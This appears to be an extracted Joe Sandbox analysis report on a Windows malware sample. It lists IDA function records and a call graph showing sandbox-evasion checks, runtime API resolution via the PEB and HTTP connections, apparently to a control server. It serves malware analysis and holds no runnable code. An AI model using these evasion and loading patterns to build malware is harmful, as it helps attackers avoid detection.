                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: String
                                                            • String ID: 11@$LCMapStringEx
                                                            • API String ID: 2568140703-3516914342
                                                            • Opcode ID: e8517c0d616e0df9a4033924f494529b67a61b9f75405e460d1b1d91209c0164
                                                            • Instruction ID: 91de7e3331bdbfbcb41da95f7e05f6e44d66f1f0f0f9d36e296516fe988f38a3
                                                            • Opcode Fuzzy Hash: e8517c0d616e0df9a4033924f494529b67a61b9f75405e460d1b1d91209c0164
                                                            • Instruction Fuzzy Hash: 2B014C32540209BBCF069F90CD06EEE7FA2EF1C755F148166FE0425161C6BA8931EF89
                                                            APIs
                                                            • ___std_exception_destroy.LIBVCRUNTIME ref: 0040C579
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ___std_exception_destroy
                                                            • String ID: f(@$ios_base::failbit set
                                                            • API String ID: 4194217158-3705395444
                                                            • Opcode ID: d500ab467568cc089f2f810d33affd2ebfdf54b471f9d9af73e546eb9498b0b3
                                                            • Instruction ID: dc76fbcea74a86ab5df7bd62cc1bfab07110206e2b1f370d9d208192458b19b9
                                                            • Opcode Fuzzy Hash: d500ab467568cc089f2f810d33affd2ebfdf54b471f9d9af73e546eb9498b0b3
                                                            • Instruction Fuzzy Hash: 2BF0B4B2A0022836D2202A56BC41B92F7CC8F40B68F10443FFD04A7682EAF8A94541A8
                                                            APIs
                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A6DCDA
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00A6DCE8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                            • String ID: 11@
                                                            • API String ID: 1687795959-1785270423
                                                            • Opcode ID: 96630a8d32283315eac16341535568e0e7a28a07d001f012752ce8a5bf4e8c9b
                                                            • Instruction ID: ac3452e582251ec439a1c139ead755842026ef3fbd06a32c3fba8030f3ae89cd
                                                            • Opcode Fuzzy Hash: 96630a8d32283315eac16341535568e0e7a28a07d001f012752ce8a5bf4e8c9b
                                                            • Instruction Fuzzy Hash: 0EF0E939B005195BCB04EBA9DC95C5DF7B9AF85BA2310407AFD02D3351DBB4ED05C694
                                                            APIs
                                                            • GetUserDefaultLCID.KERNEL32(00000055,?,00000000,0043A95A,?,00000055,00000050), ref: 00435294
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: DefaultUser
                                                            • String ID: 11@$GetUserDefaultLocaleName
                                                            • API String ID: 3358694519-96072240
                                                            • Opcode ID: 16a0718fbd455e8dc7f79371a647250a910ba3e014e61bb6336f7cb34782cdd6
                                                            • Instruction ID: 56ecbbb9c6e0ea3c164d002f9608a712f4b6e8dd4fbc805ea42157dacaae974e
                                                            • Opcode Fuzzy Hash: 16a0718fbd455e8dc7f79371a647250a910ba3e014e61bb6336f7cb34782cdd6
                                                            • Instruction Fuzzy Hash: 3DF02431A80208BBDB10AF51CC03F9E7F50EB09B50F10416AFD046A291DAB95E209ACD
                                                            APIs
                                                            • IsValidLocale.KERNEL32(00000000,00430853,00000000,00000001,?,?,00430853,?,?,00430233,?,00000004), ref: 0043535F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: LocaleValid
                                                            • String ID: 11@$IsValidLocaleName
                                                            • API String ID: 1901932003-3041995494
                                                            • Opcode ID: ec0c667621164707c1bc2b991c274cf4e18bf7ac853b3eeeb1e3ed5b34663cf6
                                                            • Instruction ID: 92ee9c0e94e9f2fbea2cc18d2d1159cfcb308c2a760149ff5b58bb71b949f05c
                                                            • Opcode Fuzzy Hash: ec0c667621164707c1bc2b991c274cf4e18bf7ac853b3eeeb1e3ed5b34663cf6
                                                            • Instruction Fuzzy Hash: 94F02430A84708B7DB10AB108D07B9EBB549B48B12F10403ABD0066281CAF95911A59D
                                                            APIs
                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0043255D,-00000020,00000FA0,00000000,00000014,00402866), ref: 004352FC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: CountCriticalInitializeSectionSpin
                                                            • String ID: 11@$InitializeCriticalSectionEx
                                                            • API String ID: 2593887523-3358978645
                                                            • Opcode ID: 4941b3bd5492a3ccd0429f2016fdf03f36fccdd9fbf1eb1f29f14e59228ea09c
                                                            • Instruction ID: 2051ed9e425ee247f5129d915950feebf7d6a3be7f43922744b44a15a137ba2f
                                                            • Opcode Fuzzy Hash: 4941b3bd5492a3ccd0429f2016fdf03f36fccdd9fbf1eb1f29f14e59228ea09c
                                                            • Instruction Fuzzy Hash: 2FF0B431A40208BBDB11AF51DD02D9F7F61EB08B51F10406AFD0556260DABA4E20EAC9
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: H_prolog3_catch
                                                            • String ID: MOC$RCC
                                                            • API String ID: 3886170330-2084237596
                                                            • Opcode ID: c784227a34fd5b7084b2c87fc19ea1d0d793304ba4906a265f634d642bdce8b4
                                                            • Instruction ID: 34e8bc77d22ddcdafc14714ce60d9b0db4004f50fe154a236d7873180d633bee
                                                            • Opcode Fuzzy Hash: c784227a34fd5b7084b2c87fc19ea1d0d793304ba4906a265f634d642bdce8b4
                                                            • Instruction Fuzzy Hash: 83F06274600124DFDB22AF65D40159D7BB0AF41748F8640EBF5045B3A1C77C6D54CFAA
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Free
                                                            • String ID: 11@$FlsFree
                                                            • API String ID: 3978063606-2352678666
                                                            • Opcode ID: 6dffc1cdda050d1ef236ec52a9cd275bb2632aad14ca1d18400e2b4c69ec58df
                                                            • Instruction ID: c1727abd3399064533d4b72406d339915fd92446a3417b7bd4380397cab03c3a
                                                            • Opcode Fuzzy Hash: 6dffc1cdda050d1ef236ec52a9cd275bb2632aad14ca1d18400e2b4c69ec58df
                                                            • Instruction Fuzzy Hash: 0FE0E532F41218ABD714AF559C07A6EBB60DB48F15F14017BFE0557281DA794E1096CE
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Alloc
                                                            • String ID: 11@$FlsAlloc
                                                            • API String ID: 2773662609-288891599
                                                            • Opcode ID: ba89461f714ec2f353eb854be2fff552b03e75bb0e63386cb5f1b0964f268f00
                                                            • Instruction ID: 656933edcbb05ac72b6cf25421a562d2aaaa3326236b7023487c433eafd234ee
                                                            • Opcode Fuzzy Hash: ba89461f714ec2f353eb854be2fff552b03e75bb0e63386cb5f1b0964f268f00
                                                            • Instruction Fuzzy Hash: 62E05C30B8170477D314AF518C03A6EB760DB0AB11F10017BFC0127280DDBD5E1085CE
                                                            APIs
                                                            • std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 00428DA3
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00428DCA
                                                              • Part of subcall function 0042862D: RaiseException.KERNEL32(?,?,0040D8A3,00000000,00000000,00000000,00000000,?,?,?,?,0040D8A3,00000000,0045617C,00000000), ref: 0042868D
                                                            Strings
                                                            • Access violation - no RTTI data!, xrefs: 00428D9A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ExceptionException@8RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
                                                            • String ID: Access violation - no RTTI data!
                                                            • API String ID: 2053020834-2158758863
                                                            • Opcode ID: a8d8be5bcc2d3cd607e2d3fdf15623eb14b1e6aa89af65ac363ffb51a07ec0b7
                                                            • Instruction ID: 704b7bedd41b8decca9880961208c58d7d7e72978fd60f0bb7cc7eac6645feb8
                                                            • Opcode Fuzzy Hash: a8d8be5bcc2d3cd607e2d3fdf15623eb14b1e6aa89af65ac363ffb51a07ec0b7
                                                            • Instruction Fuzzy Hash: 39E04FB2A593185A9A04EAD5B8478DE73EC9E24710BA0445FF900D2081EE2DF958866D
                                                            APIs
                                                            • try_get_function.LIBVCRUNTIME ref: 00429FDA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: try_get_function
                                                            • String ID: 11@$FlsAlloc
                                                            • API String ID: 2742660187-288891599
                                                            • Opcode ID: 8626dcbe6cdd30c54ada29f8a24cae781a39f5398ca56e55a922e5d7310b92a8
                                                            • Instruction ID: 02976f814a59a294967572ff2c8846d3634fef9e4185a681c56ac9216c02fddb
                                                            • Opcode Fuzzy Hash: 8626dcbe6cdd30c54ada29f8a24cae781a39f5398ca56e55a922e5d7310b92a8
                                                            • Instruction Fuzzy Hash: BDD0C231BC973663D5406B816D02B99BA048701FA3F110063F90CA1281D6994A1046CD
                                                            APIs
                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212FB
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00421309
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                            • String ID: pThreadProxy
                                                            • API String ID: 1687795959-3651400591
                                                            • Opcode ID: d978fa9c7b04847c80681c11cf36977db16e70b896a80dd6198ffb22ffb34018
                                                            • Instruction ID: 5420a3ac49ee2b21aafe02425b7e31d130dadcb6d03c7143bde2fe2a0427303a
                                                            • Opcode Fuzzy Hash: d978fa9c7b04847c80681c11cf36977db16e70b896a80dd6198ffb22ffb34018
                                                            • Instruction Fuzzy Hash: 8FD05B71E0020896D700EBB9D806E4E77A85B10718F50417B7D14E6147DF78E508C6A8
                                                            APIs
                                                            • Concurrency::details::ContextBase::CancellationBeaconStack::~CancellationBeaconStack.LIBCONCRT ref: 0041A8A1
                                                            • Hash.LIBCONCRT ref: 0041A8AE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: BeaconCancellation$Base::Concurrency::details::ContextHashStackStack::~
                                                            • String ID: +hB
                                                            • API String ID: 3232699325-4272926976
                                                            • Opcode ID: 7ad862fe756be090a11e09584eb2edb8185e7db7bb7af1f5538142d7ac1213cc
                                                            • Instruction ID: 63ff50f5f99ebaa442bb0d4aeec8a7224868785c63155d6932f4acb55241cc7c
                                                            • Opcode Fuzzy Hash: 7ad862fe756be090a11e09584eb2edb8185e7db7bb7af1f5538142d7ac1213cc
                                                            • Instruction Fuzzy Hash: 2DD0A73230451156C708772AF8019C9F761BF80710B11403FE455935518F3838AF869D
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,f(@,00000000), ref: 0042AF40
                                                            • GetLastError.KERNEL32 ref: 0042AF4E
                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AFA9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$ErrorLast
                                                            • String ID:
                                                            • API String ID: 1717984340-0
                                                            • Opcode ID: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                            • Instruction ID: 120bd2143bdce8d71afc71d227a82de2ececf14487395c5eb9abd3a2316ebb2c
                                                            • Opcode Fuzzy Hash: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                            • Instruction Fuzzy Hash: 00414830700621EFCF228F66E944B6BBBA4EF01714F95416BFC699B290D7388D01C79A
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,00A52ACD,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00A52ACD,00000000), ref: 00A7B1A7
                                                            • GetLastError.KERNEL32 ref: 00A7B1B5
                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00A52ACD,00000000), ref: 00A7B210
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$ErrorLast
                                                            • String ID:
                                                            • API String ID: 1717984340-0
                                                            • Opcode ID: 9c3ecb0086aef467e58ab233896f4880e68e88dda1315a5ce820fb7ae6c11677
                                                            • Instruction ID: 2961c2faea96eabd149332a3296e5f9efc03a123f4f67a224d2c737b01176593
                                                            • Opcode Fuzzy Hash: 9c3ecb0086aef467e58ab233896f4880e68e88dda1315a5ce820fb7ae6c11677
                                                            • Instruction Fuzzy Hash: 5441B1B5615206AFCF218F64CC54BBE7BA8EF12711F14C269E95DA71A2DB308D01CBB0

                                                            Execution Graph

                                                            Execution Coverage:6.5%
                                                            Dynamic/Decrypted Code Coverage:4.9%
                                                            Signature Coverage:1%
                                                            Total number of Nodes:1417
                                                            Total number of Limit Nodes:28
                                                            execution_graph
                                                            (The graph is rendered interactively on the original page; only its node/edge listing survives extraction. It is summarised below by node address and API label, following the edges in call order. "|" separates alternative branches out of one node. The listing breaks off in the source at node 27286, so the last chain is left incomplete.)
                                                            Main path (image at 0x400000):
                                                            • 4169f0 → 402260 → 4045c0 (17 API calls) → 404697 → 4046ac (11 API calls) / 40474f (6 API calls), then 42 sequential calls to 4045c0 (34 API calls each) from 402274 through 40268e
                                                            • 419860 → 419750 GetPEB → 41988c (21 API calls) → 419a93 LoadLibraryA ×5 → GetProcAddress at 419af4, 419b16 (×2), 419b4f, 419b71, 419b92 (×2) → 416a00
                                                            • 416a00 → 41a740 / 41a77e lstrcpy → 4011d0 → 40120f ExitProcess | 401217 → 401160 GetSystemInfo → 40117c ExitProcess | 401184 → 401110 GetCurrentProcess VirtualAllocExNuma → 401141 ExitProcess | 401149 → 4010a0 VirtualAlloc → 4010e2 VirtualFree → 401220 → 4189b0 → 401233 GlobalMemoryStatusEx → 401249 __aulldiv → 401292 ExitProcess | 40129a
                                                            • 416770 GetUserDefaultLangID → 416792 → ExitProcess at 4167a3, 4167ad, 4167b7, 4167c1 or 4167cb | 4167d3 GetUserDefaultLCID → 417850 (3 API calls) → 4178e0 (3 API calls) → 41a9b0 (41a9c1 lstrlenA, 41a9fa lstrcpy lstrcatA, 41a7a0 lstrcpy) ×5 → 41a8a0 lstrcpy → 416a89
                                                            • 416a89 → 416ac2 OpenEventA → 416af5 CloseHandle Sleep → 416b0a → back to 416a89 | 416ad9 → 416ae1 CreateEventA → 416b0c
                                                            • 416b0c → 416920 GetSystemTime → 416820 (41a740 lstrcpy, then 41a9b0 and 41a8a0 lstrcpy ×6 each, 41a7a0 lstrcpy) → 416998 sscanf → 41a800 → 4169aa SystemTimeToFileTime SystemTimeToFileTime → 4169ce → 4169d8 ExitProcess | 4169e0 → 415b10
                                                            • 415b10 → 41a740 lstrcpy → 41a820 lstrlenA / 41a87b lstrcpy (7 calls, with 416430 (41a8a0 lstrcpy ×4) between) → 4026a0 → 316 sequential calls to 4045c0 (34 API calls each) from 4026b4 through 4045a9 → 419c10 → (listing truncated)
                                                            • 415cc3 → 416430 lstrcpy → 41a7a0 → (41a9b0 → 41a8a0 lstrcpy) ×3 → 41a740 lstrcpy → 417500 GetWindowsDirectoryA → 41a7a0 lstrcpy → 404880 → 4117a0 → then, each preceded by 41a740 / 401590 lstrcpy and 405960 (39 API calls, codecvt): 411050 strtok_s strtok_s lstrlenA lstrcpy; 410d90 (7 API calls); 410f40 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy; 411a10 (121 API calls); 404fb0 (8 API calls); 410740 (292 API calls); 411170 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy; 401e80 (67 API calls)
                                                            • 415ff0 → 416000 | 416092, each via 401590 lstrcpy and 405960 into 4112d0 (21 API calls, codecvt) / 413560 (36 API calls) / 413dc0 (75 API calls), then 4140b0 (64 API calls, codecvt), 414780 (116, codecvt), 414bb0 (67, codecvt), 414d70 (75), 415100 (71), 414f40 (69, codecvt), 407710 (125, codecvt), 415050 (67, codecvt), 419010 (54, codecvt), 416630 (9, codecvt) → 416338 → 416b16 CloseHandle ExitProcess
                                                            Second path (0x22D0000 range):
                                                            • 22d0005 → 22d092b GetPEB → 22d003c → 22d0049 → 22d0e0f SetErrorMode SetErrorMode → 22d0223 → 22d0d90 → 22d0dad → 22d0dbb GetPEB / 22d0238 VirtualAlloc → 22d0265 → 22d02ce VirtualProtect → 22d030b → 22d0439 VirtualFree → 22d05f4 LoadLibraryA | 22d04be → 22d04e3 LoadLibraryA → 22d08c7
                                                            Nodes listed without edges:
                                                            • 409440 strlen malloc strcpy_s free std::exception::exception; 4090c3 (5 API calls, allocator); 4090e7 memcpy RaiseException codecvt __CxxThrowException@8; 406f60 memcpy; 410765 (279 API calls); 413916 (91 API calls, 2 library calls); 417667 lstrcpy; 4183dc (15 API calls); 41abd0 free codecvt std::exception::_Tidy; 41ac2c (71 API calls, 2 library calls); 41b050 (6 API calls, 3 library calls); 41b270 (5 API calls, 2 library calls); 41bc11 (71 API calls, 2 library calls); 41ce48 LeaveCriticalSection __initptd; 41ceea SetUnhandledExceptionFilter; 41dc60 atexit
                                                            • 22d6ebc VirtualProtect; 22d932a ??2@YAPAXI RaiseException allocator; 22d9b37 (9 API calls); 22df567 (56 API calls); 22dfd67 (152 API calls); 22e04b7 (88 API calls); 22e0cb6 (30 API calls); 22e102b strtok_s lstrlen lstrcpy; 22e102b StrCmpCA strtok_s lstrlen lstrcpy; 22e118b strtok_s StrCmpCA strtok_s lstrlen lstrcpy; 22e140b strtok_s; 22e140b StrCmpCA strtok_s; 22e1525 strtok_s strtok_s lstrlen lstrcpy ctype; 22e15b3 (18 API calls, ctype); 22e1c35 (110 API calls); 22e32ae (22 API calls); 22e3823 StrCmpCA ×4 strtok_s; 22e3b7d (91 API calls, 2 library calls); 22e6a0a ExitProcess; 22e6a40 (6 API calls); 22e6c57 (689 API calls); 22e6d18 (643 API calls); 22ebe78 (162 API calls, 2 library calls); 22ecd8f (6 API calls, 2 library calls); 22ecd90 (173 API calls, 3 library calls); 22ecd97 (170 API calls, 2 library calls); 22ed0af RtlLeaveCriticalSection __initptd; 22ed106 (41 API calls, __amsg_exit)
419c20 43 API calls 27285->27286 27287 41a036 8 API calls 27285->27287 27286->27287 27288 41a146 27287->27288 27289 41a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27287->27289 27290 41a153 8 API calls 27288->27290 27291 41a216 27288->27291 27289->27288 27290->27291 27292 41a298 27291->27292 27293 41a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27291->27293 27294 41a2a5 6 API calls 27292->27294 27295 41a337 27292->27295 27293->27292 27294->27295 27296 41a344 9 API calls 27295->27296 27297 41a41f 27295->27297 27296->27297 27298 41a4a2 27297->27298 27299 41a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27297->27299 27300 41a4ab GetProcAddress GetProcAddress 27298->27300 27301 41a4dc 27298->27301 27299->27298 27300->27301 27302 41a515 27301->27302 27303 41a4e5 GetProcAddress GetProcAddress 27301->27303 27304 41a612 27302->27304 27305 41a522 10 API calls 27302->27305 27303->27302 27306 41a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27304->27306 27307 41a67d 27304->27307 27305->27304 27306->27307 27308 41a686 GetProcAddress 27307->27308 27309 41a69e 27307->27309 27308->27309 27310 41a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27309->27310 27311 415ca3 27309->27311 27310->27311 27312 401590 27311->27312 27587 401670 27312->27587 27315 41a7a0 lstrcpy 27316 4015b5 27315->27316 27317 41a7a0 lstrcpy 27316->27317 27318 4015c7 27317->27318 27319 41a7a0 lstrcpy 27318->27319 27320 4015d9 27319->27320 27321 41a7a0 lstrcpy 27320->27321 27322 401663 27321->27322 27323 415510 27322->27323 27324 415521 27323->27324 27325 41a820 2 API calls 27324->27325 27326 41552e 27325->27326 27327 41a820 2 API calls 27326->27327 27328 41553b 27327->27328 27329 41a820 2 API calls 27328->27329 27330 415548 27329->27330 27331 41a740 lstrcpy 27330->27331 27332 415555 27331->27332 27333 41a740 lstrcpy 27332->27333 27334 415562 27333->27334 27335 41a740 lstrcpy 
27334->27335 27336 41556f 27335->27336 27337 41a740 lstrcpy 27336->27337 27377 41557c 27337->27377 27338 41a740 lstrcpy 27338->27377 27339 415643 StrCmpCA 27339->27377 27340 4156a0 StrCmpCA 27341 4157dc 27340->27341 27340->27377 27342 41a8a0 lstrcpy 27341->27342 27343 4157e8 27342->27343 27345 41a820 2 API calls 27343->27345 27344 41a820 lstrlenA lstrcpy 27344->27377 27346 4157f6 27345->27346 27349 41a820 2 API calls 27346->27349 27347 415856 StrCmpCA 27348 415991 27347->27348 27347->27377 27350 41a8a0 lstrcpy 27348->27350 27351 415805 27349->27351 27353 41599d 27350->27353 27354 401670 lstrcpy 27351->27354 27352 401590 lstrcpy 27352->27377 27355 41a820 2 API calls 27353->27355 27374 415811 27354->27374 27358 4159ab 27355->27358 27356 415a0b StrCmpCA 27359 415a16 Sleep 27356->27359 27360 415a28 27356->27360 27357 4152c0 29 API calls 27357->27377 27361 41a820 2 API calls 27358->27361 27359->27377 27362 41a8a0 lstrcpy 27360->27362 27363 4159ba 27361->27363 27365 415a34 27362->27365 27364 401670 lstrcpy 27363->27364 27364->27374 27366 41a820 2 API calls 27365->27366 27367 415a43 27366->27367 27368 41a820 2 API calls 27367->27368 27369 415a52 27368->27369 27372 401670 lstrcpy 27369->27372 27370 41a8a0 lstrcpy 27370->27377 27371 41578a StrCmpCA 27371->27377 27372->27374 27373 41a7a0 lstrcpy 27373->27377 27374->26431 27375 41593f StrCmpCA 27375->27377 27376 4151f0 23 API calls 27376->27377 27377->27338 27377->27339 27377->27340 27377->27344 27377->27347 27377->27352 27377->27356 27377->27357 27377->27370 27377->27371 27377->27373 27377->27375 27377->27376 27379 417553 GetVolumeInformationA 27378->27379 27380 41754c 27378->27380 27381 417591 27379->27381 27380->27379 27382 4175fc GetProcessHeap HeapAlloc 27381->27382 27383 417619 27382->27383 27384 417628 wsprintfA 27382->27384 27385 41a740 lstrcpy 27383->27385 27386 41a740 lstrcpy 27384->27386 27387 415da7 27385->27387 27386->27387 27387->26452 27389 41a7a0 lstrcpy 27388->27389 27390 404899 27389->27390 27596 4047b0 
27390->27596 27392 4048a5 27393 41a740 lstrcpy 27392->27393 27394 4048d7 27393->27394 27395 41a740 lstrcpy 27394->27395 27396 4048e4 27395->27396 27397 41a740 lstrcpy 27396->27397 27398 4048f1 27397->27398 27399 41a740 lstrcpy 27398->27399 27400 4048fe 27399->27400 27401 41a740 lstrcpy 27400->27401 27402 40490b InternetOpenA StrCmpCA 27401->27402 27403 404944 27402->27403 27404 404955 27403->27404 27405 404ecb InternetCloseHandle 27403->27405 27609 418b60 GetSystemTime lstrcpy lstrcpy 27404->27609 27407 404ee8 27405->27407 27604 409ac0 CryptStringToBinaryA 27407->27604 27408 404963 27610 41a920 lstrcpy lstrcpy lstrcatA 27408->27610 27412 404976 27413 41a8a0 lstrcpy 27412->27413 27418 40497f 27413->27418 27414 41a820 2 API calls 27415 404f05 27414->27415 27416 41a9b0 4 API calls 27415->27416 27419 404f1b 27416->27419 27417 404f27 codecvt 27420 41a7a0 lstrcpy 27417->27420 27422 41a9b0 4 API calls 27418->27422 27421 41a8a0 lstrcpy 27419->27421 27433 404f57 27420->27433 27421->27417 27423 4049a9 27422->27423 27424 41a8a0 lstrcpy 27423->27424 27425 4049b2 27424->27425 27426 41a9b0 4 API calls 27425->27426 27427 4049d1 27426->27427 27428 41a8a0 lstrcpy 27427->27428 27429 4049da 27428->27429 27611 41a920 lstrcpy lstrcpy lstrcatA 27429->27611 27431 4049f8 27432 41a8a0 lstrcpy 27431->27432 27434 404a01 27432->27434 27433->26455 27435 41a9b0 4 API calls 27434->27435 27436 404a20 27435->27436 27437 41a8a0 lstrcpy 27436->27437 27438 404a29 27437->27438 27439 41a9b0 4 API calls 27438->27439 27440 404a48 27439->27440 27441 41a8a0 lstrcpy 27440->27441 27442 404a51 27441->27442 27443 41a9b0 4 API calls 27442->27443 27444 404a7d 27443->27444 27612 41a920 lstrcpy lstrcpy lstrcatA 27444->27612 27446 404a84 27447 41a8a0 lstrcpy 27446->27447 27448 404a8d 27447->27448 27449 404aa3 InternetConnectA 27448->27449 27449->27405 27450 404ad3 HttpOpenRequestA 27449->27450 27452 404b28 27450->27452 27453 404ebe InternetCloseHandle 27450->27453 27454 41a9b0 4 API calls 27452->27454 27453->27405 
27455 404b3c 27454->27455 27456 41a8a0 lstrcpy 27455->27456 27457 404b45 27456->27457 27613 41a920 lstrcpy lstrcpy lstrcatA 27457->27613 27459 404b63 27460 41a8a0 lstrcpy 27459->27460 27461 404b6c 27460->27461 27462 41a9b0 4 API calls 27461->27462 27463 404b8b 27462->27463 27464 41a8a0 lstrcpy 27463->27464 27465 404b94 27464->27465 27466 41a9b0 4 API calls 27465->27466 27467 404bb5 27466->27467 27468 41a8a0 lstrcpy 27467->27468 27469 404bbe 27468->27469 27470 41a9b0 4 API calls 27469->27470 27471 404bde 27470->27471 27472 41a8a0 lstrcpy 27471->27472 27473 404be7 27472->27473 27474 41a9b0 4 API calls 27473->27474 27475 404c06 27474->27475 27476 41a8a0 lstrcpy 27475->27476 27477 404c0f 27476->27477 27614 41a920 lstrcpy lstrcpy lstrcatA 27477->27614 27479 404c2d 27480 41a8a0 lstrcpy 27479->27480 27481 404c36 27480->27481 27482 41a9b0 4 API calls 27481->27482 27483 404c55 27482->27483 27484 41a8a0 lstrcpy 27483->27484 27485 404c5e 27484->27485 27486 41a9b0 4 API calls 27485->27486 27487 404c7d 27486->27487 27488 41a8a0 lstrcpy 27487->27488 27489 404c86 27488->27489 27615 41a920 lstrcpy lstrcpy lstrcatA 27489->27615 27491 404ca4 27492 41a8a0 lstrcpy 27491->27492 27493 404cad 27492->27493 27494 41a9b0 4 API calls 27493->27494 27495 404ccc 27494->27495 27496 41a8a0 lstrcpy 27495->27496 27497 404cd5 27496->27497 27498 41a9b0 4 API calls 27497->27498 27499 404cf6 27498->27499 27500 41a8a0 lstrcpy 27499->27500 27501 404cff 27500->27501 27502 41a9b0 4 API calls 27501->27502 27503 404d1f 27502->27503 27504 41a8a0 lstrcpy 27503->27504 27505 404d28 27504->27505 27506 41a9b0 4 API calls 27505->27506 27507 404d47 27506->27507 27508 41a8a0 lstrcpy 27507->27508 27509 404d50 27508->27509 